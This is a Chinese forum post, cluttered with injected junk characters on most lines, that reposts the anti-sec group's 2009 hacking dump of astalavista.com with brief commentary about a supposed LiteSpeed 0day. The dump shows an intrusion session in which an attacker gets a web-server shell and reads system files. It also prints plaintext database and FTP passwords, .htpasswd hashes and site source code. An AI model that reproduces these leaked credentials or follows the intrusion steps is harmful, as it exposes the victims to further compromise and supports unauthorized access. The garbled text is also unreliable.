里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。5 O' i- |1 Z9 H1 d9 y
( ?: c% x0 M: y
[root@front3 ~]# curl -I litespeedtech.com* A( ?* V( U" K1 \
HTTP/1.1 200 OK) `, P7 n( C0 G; c% ]. u E! Q
Date: Fri, 05 Jun 2009 22:54:51 GMT
3 k- X6 y6 Z) L+ DServer: LiteSpeed' k# y' E) S& D; O
8 @1 z3 [& e; l! v另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-
) O g: n) |) E a, R4 H4 Q5 `* \6 \/ j/ g" U" s. W9 X
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。$ {" d0 s: f8 z! h8 a! ?. l
- z: s$ I; e+ n2 ^1 P a
) X4 Z9 j9 l2 Y( J/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \ 9 ~ ?( X' E1 L/ E& M
/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \% Q6 l- i8 C+ {' z- U0 _5 J
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \6 M8 x4 r1 S( }' y3 J. V, Y- ]
\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /
' }1 \) e x+ e( v% d \/ \/ \/ \/ \/ \/ \/
1 Y3 i8 g% S: E/ V" E6 J The Hacking & Security Community) w9 [8 v- ]3 S; Q* d% w
[+] Founded in 1997 by a hacker computer enthusiast
6 ]2 R' O$ G2 I0 O3 o[-] Exposed in 2009 by anti-sec group
# i% f3 i, }& C# u8 p) S' } g0 e6 [! ]( r# a1 ]4 i; M
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:1 \) r5 r9 F/ B
>> 03. Who’s behind the site?
5 e4 {3 k5 R/ e6 S>>
/ E$ B; [$ I" r6 x>> A team of security and IT professionals, and a countless number of contributors from all over the world.
4 n, f: q' q. s5 u$ Q, l" a* D$ O- n* n6 H- ^8 D
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
9 H" K' t; S7 G>>
0 D* c5 G. }2 ^>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
% i! E/ X: {: l+ xmilitary institutions.- Q% L% h6 P$ ]7 y
>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.# S8 G z, Y8 b, R4 c# G
& q2 A ?8 Y, p- A
Why has Astalavista been targeted?
' |5 X9 n0 [9 p9 t4 c1 v, M+ ~, R1 Y7 e$ {' A& J* Z
Other than the fact that they are not doing any of this for the “community” but
7 O* C% Y1 R% B! Q! {for the money, they spread exploits for kids, claim to be a security community* I1 D u$ d4 V: p% E9 Z! P* e
(with no real sense of security on their own servers), and they charge you $6.66% f5 F6 H8 r% p8 q0 q
per months to access a dead forum with a directory filled with public releases: }1 x6 q- q- o4 ~6 [. A
and outdated / broken services.* G0 E( w# f2 K, L( w7 k
y, G1 {3 Y3 t( k/ gWe wanted to see how good that “team of security and IT professionals” really is.3 D4 @$ B' l% W; f9 D! _" X+ U
1 U! Y. l+ H' r, N& o/ tLet’s begin.
. P6 x9 ` Q( {; e4 x7 h
, w" o1 q( X: N4 e! kanti-sec:~# ./g0tshell astalavista.com -p 80
4 |% q+ X! ]$ X[+] Connecting to astalavista.com:801 d8 J$ \) G* X2 _% ~& a* K
[+] Grabbing banner…
8 L" C5 Y+ V! L' H4 c/ rLiteSpeed
% H; A! R, j( J% r( O% [[+] Injecting shellcode… I; h: \# X% v" T* f
[-] Wait for it
8 I: k$ [3 @0 K* Z8 s
) b" f, r: K! t[~] We g0tshell" r$ z4 I% e. B
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux. s' P, [/ }- |
ID: uid=100(apache) gid=500(apache) groups=500(apache)6 j: @* n' t$ i% k
3 _7 b: f0 g' |, n# m# Y G9 Xsh-3.2$ cat /etc/passwd% T; Z5 e6 M" S- i) ~( A
root:x:0:0:root:/root:/bin/bash* ~5 n. S. o) `' v; [
bin:x:1:1:bin:/bin:/sbin/nologin
* D/ c1 `( M; z$ Cdaemon:x:2:2:daemon:/sbin:/sbin/nologin4 C7 ~4 G3 R% e7 C: Q# p- [
adm:x:3:4:adm:/var/adm:/sbin/nologin
2 m# ~; o. i, D, Zlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin$ ?" c. x q% U8 e+ Y* m) P, v
sync:x:5:0:sync:/sbin:/bin/sync( u a+ n1 t* z& l& t% p
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
$ f. Z% e* J3 Yhalt:x:7:0:halt:/sbin:/sbin/halt
& R% [1 X' d/ `& @mail:x:8:12:mail:/var/spool/mail:/sbin/nologin9 P' G8 g* W. o- M- a) e" E
news:x:9:13:news:/etc/news:3 q) w0 I" ]+ ~, R4 t; n
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
1 a& ~" S- X& l+ q* w" U0 { Hoperator:x:11:0 perator:/root:/sbin/nologin" _& N6 m' }% f0 Y& I
games:x:12:100:games:/usr/games:/sbin/nologin1 ?9 z K# s, i* z" d! i
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin( y- \4 [# m" y* H' u3 Q0 \1 o. m
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
5 g5 c! A2 u- T- s- ]4 o" Z* Jnobody:x:99:99:Nobody:/:/sbin/nologin5 e0 `/ Q2 ~! s! y+ N
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
8 P( T2 [9 p( M" h7 \0 pdbus:x:81:81:System message bus:/:/sbin/nologin
6 i) |0 G! N, t7 p( r9 Rnscd:x:28:28:NSCD Daemon:/:/sbin/nologin
7 R. n5 A, ?+ \5 jmailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
+ c V% T. b# O8 d$ osmmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
* D9 n. I5 `. @" y- p; z% y) Ivcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin. O4 b. l. Q7 j" X9 l8 h0 J9 B, a
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin: x* z3 K1 s4 n% h7 M+ n
rpc:x:32:32 ortmapper RPC user:/:/sbin/nologin% |( p, y* }. o1 h3 H
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin" |; \6 n, {, J2 G
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
& v) j3 j4 @3 [2 h" esshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin2 y6 O( I' h4 C1 o+ u! ^
pcap:x:77:77::/var/arpwatch:/sbin/nologin( X+ e1 q" K& |1 B* H; Y
named:x:25:25:Named:/var/named:/sbin/nologin, N# c/ B: i* Z' i* v
apache:x:100:500::/var/www:/bin/false
) {/ g/ V' f8 _ E+ o- fdiradmin:x:101:101::/usr/local/directadmin:/bin/bash1 \& S9 f3 _# _, X/ a
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash9 n( N/ u; ^6 U' Q7 B
webapps:x:500:501::/var/www/html:/bin/bash
8 A; i5 V. d6 X! w: t# Rmajordomo:x:103:2::/etc/virtual/majordomo:/bin/bash" _" g% k* b: B8 q* U, w" l" ]
admin:x:501:502::/home/admin:/bin/bash
, F6 N4 D) a& l' i1 h, L+ J+ ujon:x:502:503::/home/jon:/bin/bash! s/ A1 P( |+ _3 k" w
com:x:503:504::/home/com:/bin/bash$ w; x3 s0 I& g) F! a& r
ntp:x:38:38::/etc/ntp:/sbin/nologin1 z m# I% N! |2 s: r) F' m
ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin
# `& Z7 w% K" t! zastanet:x:504:505::/home/astanet:/bin/bash t' M$ G! _& o4 P- ~/ z! U
avahi:x:70:70:Avahi daemon:/:/sbin/nologin i- Q* i! g2 v# E( K
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
; R$ [* p: V& v9 A5 T
7 ?" [& V% ]& R7 Q2 osh-3.2$ cat /etc/hosts5 ^- Q& {' x, f
# Do not remove the following line, or various programs
$ q f+ d7 M0 @: B7 @# that require network functionality will fail.
. I' L \2 J$ ]. Q% _. s4 B/ ^127.0.0.1 localhost.localdomain localhost
$ {: V* Y* m G/ B0 P# H::1 localhost6.localdomain6 localhost6
7 z h8 g# a J6 y2 T6 x$ l80.74.154.172 asta1.astalavistaserver.com
; ?& \# _! `; l5 D! G- c: f, ~- o" A n
, T3 R, D; Z1 D! s9 D) n3 x9 X9 n& Dsh-3.2$ pwd
- j: {( N' v/ K2 I/home/com/public_html/ H2 X; w' N- L& w4 j$ T
5 }( ^: S& x, Csh-3.2$ ls -la3 }9 ]7 M( u; |% b
total 184603 Z' r' z6 z K0 ^5 `
drwxr-xr-x 30 com apache 4096 May 28 17:06 .
! c4 I" P2 {- E" C/ cdrwx–x–x 11 com com 4096 Jun 25 2008 .., A K: |0 Z: {6 q/ T: m; i
drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin
9 M) F, i8 q, m N8 ^. g! O9 }drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache" t6 B2 i+ _' b1 M/ @" q
drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
, V# x( H7 G2 Rdrwxrwxrwx 2 com com 4096 May 19 00:50 config1 I% N8 \ N# F; d. Y9 T5 t: M
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core
& @: A7 s8 ]0 S) r! fdrwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules
5 k5 \" ?6 T5 ]8 j/ d k2 @drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
( T+ A# {, O) a7 ^drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo; [9 b5 T/ ^ p! }
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__7 P! M' a* _0 q$ e; a3 D' ^! d" ~( G
-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php
4 y2 [" U! K/ d& A: E# b4 Adrwxr-xr-x 2 com com 4096 Sep 9 2008 dvd
& p, v/ r" g1 T% `2 Xdrwxr-xr-x 3 com com 4096 Feb 2 19:29 editor. F* q5 `$ R+ ]7 X5 r
-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico5 f( k$ M9 g8 V$ d
drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed% S7 B q0 W) k. c7 j) C( t5 n
-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess
& G8 V0 Q6 H. w. Y+ U( y v-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak
5 [5 e9 V/ u- D V$ |-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak
7 j' E( v/ }2 s" n& ]drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
! q+ h- K/ Z% \9 S: A5 R6 hdrwxrwxrwx 14 com com 4096 Feb 2 19:29 images
" r( f4 E) z! f, W' i-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php
) s Q! W& o4 X3 x2 Rdrwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
9 O% f# }* Z1 B( rdrwxr-xr-x 8 com com 4096 Feb 2 19:29 lang3 U8 I! Q. k6 x# q
drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib/ K- W* f4 s5 |, r: u% k
drwxrwxrwx 12 com com 4096 Jun 2 07:47 media2 _' T% A% z% K4 p" @* J
drwxr-xr-x 8 com com 4096 May 11 12:48 modifications/ }" B1 {* V1 ? p) W& ?9 M2 m
drwxr-xr-x 34 com com 4096 May 28 16:30 modules
) E7 H$ g& c/ x" s0 K( Jdrwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
g- f2 }4 `' e9 C% Pdrwxrwxr-x 22 com com 4096 May 28 17:06 _new1 E# v7 G- `7 w9 e
drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old4 y% G$ X; ?/ c3 m0 J
drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy+ j, i. n" ]6 S: ~
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy
3 P2 y% u$ [ T3 c" u* n) v-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt$ [' D7 c2 V* [ |5 b
-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml& n# H5 \: o/ C; t* I; Q- r
-rw-r–r– 1 com com 223 Mar 30 15:32 test.php
( ]5 E& q+ B6 R2 Q, N% sdrwxrwxrwx 8 com com 4096 Mar 6 13:15 themes3 c! i5 z; ~% d, t- H) v. @
drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp
: T( N% f- l( o9 U& Xdrwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam0 P. I, D3 B8 ^) x
" M. l- f1 L& \- d* a" Y2 z0 H
sh-3.2$ head -20 index.php+ m9 I8 R% C; @' d* S C$ ~) S" O
<?php
5 h; @0 j% k9 U* n7 S: a' R9 o' m" V, `+ D* p1 B8 S$ k. B4 E
/**
) A5 V9 K: R; e- ^7 G2 i% X, V- \* The main page for the CMS
) E _; P$ O, v- M* @copyright CONTREXX CMS - COMVATION AG
0 ?7 X( o* n+ r* @author Comvation Development Team: U# `, V2 ~ s6 q4 M2 C z
* @version v1.0.9.10.1 stable
2 y1 j7 I0 J, V* F8 t i* @package contrexx
' t/ ]5 M3 M1 G- p5 o) [$ f. e* @subpackage core
% a' t8 ~! l% z* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
/ z! ^3 @0 a- z4 ^8 E* @since v0.0.0.03 D( s! n. b g+ Z1 u. |
* @todo Capitalize all class names in project. W) _" P7 N6 h& ^* Y i& G2 q
* @uses /config/configuration.php* v# F2 a) d$ E2 Q. z6 c
* @uses /config/settings.php: g- P( ?, P' ]5 M. G5 G
* @uses /config/version.php
, l0 n `. \7 J) ]( n9 L; _* @uses /core/API.php
" r' y& \% V7 T( H4 |7 z* V0 c4 t* @uses /core_modules/cache/index.class.php
8 b- E2 F* G7 }5 O0 _* @uses /core/error.class.php
) w9 R1 {# ^- i; k/ b0 G- K* @uses /core_modules/banner/index.class.php1 R% Y8 f" s6 n& T1 d- i
* @uses /core_modules/contact/index.class.php4 J% {. X/ N7 @' F) y# _* ?
7 W, O+ Z' ?2 k0 S' n( S( D8 e
sh-3.2$ cd config/
' C* F2 @- J5 tsh-3.2$ ls -la" T" m6 T, e' v1 j+ v' m
total 321 }! G- E" B& g; ?% D8 H
drwxrwxrwx 2 com com 4096 May 19 00:50 .
# g' f9 R) k A6 s! udrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
) w$ p- p2 k/ n' A& I5 G) ~9 u-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php
" X0 c: e$ j0 {& s$ i0 L. {3 G-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php
* ?* k$ m; A" C# l/ K/ J8 B-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
" }0 |* v# T5 M2 o8 q* N-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php
8 }2 L/ {0 k8 D; K$ s8 D% S2 } _: f# ]1 A1 G4 S1 s; \% T
sh-3.2$ cat configuration.php
, S, I3 i, {9 S; R" B: y[snip]
, a8 X" u0 |8 ]+ E! {: Y$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost9 @! f9 B& ]+ f8 c6 J
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name e" v4 s" L, _# U
$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix9 p- ?9 W' P* u4 q; P: ?
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username$ C( {% F3 J/ V1 Y. G$ ?; A
$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
) q$ d$ q7 x$ T) K! Z8 k$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)2 K9 R2 S1 \2 \2 o+ u, D: F" {
$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)
5 f' e% r, J8 l0 M9 \# I[snip]
" n) _; E' E( t5 x; x6 y2 ^! Q$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
4 i- y( m x/ n+ M- t! I$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode- y# o5 h; j3 o% }, K
$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost
' R- G1 \; f+ k" ?7 H' ? f2 Y+ @$_FTPCONFIG['port'] = 21; // Ftp remote port
9 q" V9 |( Z/ U5 L# @$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username/ q# P3 C% h$ s/ d
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password
+ a4 [/ N- O8 W8 J# A$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms* x7 o' ~* z; w& v) X$ E
3 k9 M- D: m& I% D# N: ~8 vsh-3.2$ cd ..
# `0 ~4 A( o; Y/ X( \5 K, r* Rsh-3.2$ cd dvd/. J/ B5 k$ {9 R. w) n
sh-3.2$ ls -la
$ S0 _$ a9 t/ w% I: s* ^! @6 htotal 2913780+ {! v& n5 {0 K8 J; z
drwxr-xr-x 2 com com 4096 Sep 9 2008 .5 `; X. b# s# N) M
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..* c, l7 j) p5 N% \8 k4 ~$ C! |- \
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar
9 c r Y( c R-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar1 m2 g. w; p4 P4 l; J) _: ]
-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar
+ N2 r( U6 `9 p8 h5 }-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess
6 z: J. ~9 G! K, F! ?. H3 b
+ R t* ~; D) B. Ksh-3.2$ cat .htaccess
. d; W6 H, N1 `* G: S; @9 v9 `: B/ f: jauthType Basic: S x1 S$ W$ |7 D7 h
authName DVD
2 h* n y, z. A( ZauthUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd: ^( ` |$ C9 X H k' o9 M
require valid-user
9 E4 _5 X1 w. L& x% y& }; L2 F; R0 F' H- i3 A) q3 k) Y
sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
4 t. ?1 {) N' W# y' s5 c% {2 l$ J6 `DVDdownload:CRD8cuY6.MPT6
/ K( v) [( Q( e- [DVDdownload2:CR8a36.wluFMg
% Q) w4 S* D4 R' _4 W. ~+ B7 M/ d l2 C# c$ {# ?3 Z$ g( K" q
sh-3.2$ cat test.php8 j% }* O8 `8 w' x$ F& F- N
<?php" \- P6 |6 e4 f
$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;
4 G$ R0 r. M4 G" Y$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));
% o& M: N5 N0 o" T( j2 decho $url;
* e$ ~) s6 s( ?: L?>* L- Q' _* g P" e; T9 P$ w
2 i( _6 O, o7 F+ r- v
sh-3.2$ cd modifications/
+ q' J( k4 M0 c8 }; c7 xsh-3.2$ ls -la/ l7 M, o2 ]; ^
total 32
_, k; g( l6 w) mdrwxr-xr-x 8 com com 4096 May 11 12:48 .
3 ~* a7 _1 i: C; {drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
# q" f- |8 ?8 c2 P: |7 x Qdrwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng/ ]( d! H% R3 ]- M( _; |7 v
drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
# { G1 N) l: v K# k) b/ Odrwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools- O8 E- d' b, M# ]
drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc' A% `1 i1 l8 M( p d7 d, M8 U& P
drwxr-xr-x 2 com com 4096 Feb 2 19:33 search& q. b6 R% @9 r O
drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp" m* o* F* B: ^, u5 ?0 h
* f; g5 _0 ]) F
sh-3.2$ ls -R( j; C* v. s2 c' p' e* f$ D3 m# ^( k
.:
& f8 t( s! o$ t2 `8 a0 bcom_avtng cronjobs onlinetools pjirc search _tmp) F: C6 u7 k5 ]! w' C
1 P2 o* m' @: M3 `4 W% B./com_avtng: o8 ~; j1 x# V$ B' J
avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
: f5 G ]0 L3 W( D( X
/ _7 C7 s. N" q$ O6 {./com_avtng/scripts:* l9 V1 M7 A4 z% d3 W
popunder.js
6 d+ d/ ^ f: ~4 W9 G$ x" u2 h+ |9 |) K* q' E, n" h, J& B
./cronjobs:9 i) m0 Q7 Q0 O6 S- @+ }8 S
exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp
5 n. r% \, Z) c9 p6 y0 j
2 i4 k0 t9 p- V' s% f./cronjobs/tmp:
1 I! G4 A+ p' V; \& Wcontrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv5 O) s% V/ A0 u7 G1 m; f
|9 ]: |+ s$ o i./onlinetools:1 L( m# {2 A- [# ~; F |5 j
index.php
- |- r- C5 W+ K8 i7 F: O6 E. I! q6 `6 Y! [. J+ c2 M4 a
./pjirc:
6 O1 g* I$ G$ `. g2 ma_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt$ g3 w. P# x7 ^3 m
AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt& k/ F z* v3 J, o7 V# R& }
background.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd
1 z% D% L5 ~! h) d# a
6 G4 Y$ k7 \# S# I./pjirc/img:% X3 B8 W+ p: W1 L$ @7 ~+ j: r# [
ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif3 D& ^) R" c; y7 D% r5 ]4 ^
arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif
9 V9 p$ _5 o& B$ `2 w& zverre-eau.gif6 B* ?/ R7 X) s- q3 o
argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
! @7 [! C8 G7 z+ Jverre-vin.gif, E+ \- G% t* h) Q, I% |
ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif& G$ n3 W, v0 i' n) O9 K1 h% w
biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif
* P2 h$ M+ Z/ r+ w" F) Y, ]6 q1 A! g. p4 M) s
./pjirc/snd:, F& ~. V. A' Y2 s
bell2.au ding.au
: @/ @5 I3 x7 x3 J2 v4 U1 v; g9 T' O; E V
./search:& h- K E/ D! N6 W
searchEngines.php search.php
6 c$ @/ n C+ B- _/ a/ \( e7 Q8 A5 ?4 p2 h
./_tmp:/ N# c5 T; n7 {/ u
defaultPorts.php defaultPorts.txt& E0 K2 Y7 z2 e( @# U
8 p/ m0 Y% x+ E0 ~4 V% ^0 V
sh-3.2$ cd cronjobs/
8 z6 t2 h; o) t, l/ L2 f8 A$ ~9 ysh-3.2$ cat exploits.php# S. }1 N m9 \- g
[snip]& v% {" I3 _9 E: x! p
$categories = array();) |9 z- p [; T
$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;
0 ~$ n& f$ W4 k$expolits = file($milw0rmFile);; `5 E2 @4 n+ F8 g/ P
$comExploits = array();: ^0 V5 n3 ^: z, U/ }$ r
[snip]
% I( `4 K* C6 }% P8 i& [8 r# |// manage data
' {* {/ Z- m8 E0 @2 \3 qfor ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640; q; a% W/ b* p6 k* g* s* n
! Q) S, t+ S9 s) A0 y6 G8 T( q // get path and title6 o' Y5 N4 D1 t- d: ?9 Q
$expolits[$x] = trim($expolits[$x]);
* R! J, b1 E/ Y- _9 _1 i' U $path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));" k3 E' @* }. v; J8 z5 D" _
$title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);
" j8 q: U6 u6 q3 C8 {9 s/ e! G& Q( ?+ z
// check if file exists
7 \; C$ r3 V. ^6 }0 N5 W' h% b: q2 _ if (file_exists($path)) {
) B/ O, N6 x5 f) m7 c
' H0 f% ^; i! j1 J/ | $text = file_get_contents($path);
+ F9 C0 Z9 v- j$ ?7 p
9 D* B% S4 P7 f6 e // get content and date8 c/ L; T- r0 M3 a% `$ X. I7 u
//$text = htmlspecialchars($text, ENT_QUOTES);5 M/ ~5 o0 Y. P4 q' L. Z9 s. u
$tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));* j) Z p( p2 F6 W
if ($tmptext != ”) {
# y* Y% ?% n' X- d8 Z9 o $text = $tmptext;
3 l" D/ |3 x1 u% Y+ D" e( h/ u' p } else {" S* {. m, T1 n
$text = addslashes(htmlentities($text, ENT_QUOTES));- J9 n9 O/ B- b- e1 w0 s
}; A8 d$ O" |+ }0 e- i0 J. m+ j
$date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));) A9 ^& r6 G2 Z
$tmp = explode('-', $date);
# C: C4 Z4 i/ F7 j' | $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));# ]& S% f* [& p2 h4 w# M$ I7 E0 F
$cat = getCategory ($path);
8 n% v9 |- Z u7 s: t $ext = pathinfo(basename($path));
) V$ m8 m5 C5 d8 D5 I5 \ $ext = $ext['extension'];
$ D) a, t' ` q# r+ m4 e. y: h $qStr = ”
4 V2 P( Y: ]! f+ \9 D! u SELECT `id`
+ C. g) D# X2 u2 l# v" g1 g% Q FROM `contrexx_module_exploits`
6 Z, W9 f" o: Z WHERE `title` = ‘” . $title . “‘# c8 v3 C: x' S' }8 ]9 A/ x
AND `date` = ‘” . $date . “‘
3 v/ b) Q( x( V “;
6 |, S( K1 F. t2 j! ? echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
/ A7 Z3 Q- n! R0 l+ t $q = $_objDB->query($qStr);- I3 |% P8 \( |$ _7 i& o
$ ?- s3 @8 a, M' _1 w
if ($q->numRows() == 0) {3 ~' a0 i4 L! r" B2 k& N: A+ p
6 J$ O0 T; Z, f+ K- z // prepare array9 V5 T) K6 Z& Y6 v c
$comExploits[$x]['date'] = $date;
+ e3 ^. }( U, a $comExploits[$x]['title'] = $title;6 N. Z$ Z+ B2 C7 ?, |
$comExploits[$x]['author'] = ‘milw0rm’;# f7 [6 t: r3 F6 S D# ~
$comExploits[$x]['text'] = $text;2 v$ o; b' M1 p
$comExploits[$x]['source'] = $ext;7 _3 \0 n* p) C
$comExploits[$x]['url1'] = ”;8 q$ J( x X3 N$ c& ^( S" z
$comExploits[$x]['url2'] = ”;% g6 h' d$ o4 P9 N
$comExploits[$x]['catid'] = $cat;
$ S0 v4 @3 e5 l3 s5 D $comExploits[$x]['lang'] = ‘2′;+ I, z1 c* J p" I- i( i/ ]
$comExploits[$x]['userid'] = ‘12′;6 i$ C' O: c" a$ @5 T; \0 R
$comExploits[$x]['startdate'] = ‘0000-00-00′;) ] c5 J s4 j$ [5 o, [5 U) }
$comExploits[$x]['enddate'] = ‘0000-00-00′;
: D. V2 S, k& f $comExploits[$x]['status'] = ‘1′;! i6 R v' a+ I C8 m; a7 e
$comExploits[$x]['changelog'] = $date;
t6 o; g2 ~6 [0 y0 u I, r& Z5 ~6 x) `" G l- v6 p
}
' y6 v0 H+ R" M; n[snip]
+ Z6 u) l8 X) c; P/ f6 b2 W $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
$ {6 ~! l P& P9 g* f3 M<rss version=”2.0″>, i" L# O$ v, b* W/ b: {
<channel>
2 f# a' g+ @. @$ w5 l <title>ASTALAVISTA.com - Exploits</title>
0 f; y4 e. D& r1 I+ \ <link>http://www.astalavista.com/exploits</link>4 l3 g, J( C+ r' \$ S
<description>All availably Exploits.</description>
